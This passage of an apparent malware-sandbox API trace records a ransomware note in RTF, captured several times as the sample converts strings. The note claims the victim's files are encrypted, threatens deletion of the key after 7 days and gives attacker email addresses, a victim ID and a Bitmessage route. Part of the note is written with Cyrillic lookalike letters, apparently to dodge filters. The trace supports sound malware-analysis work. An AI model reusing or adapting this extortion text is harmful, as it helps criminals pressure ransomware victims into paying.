\r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0297.602] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0297.602] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x24866c8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. 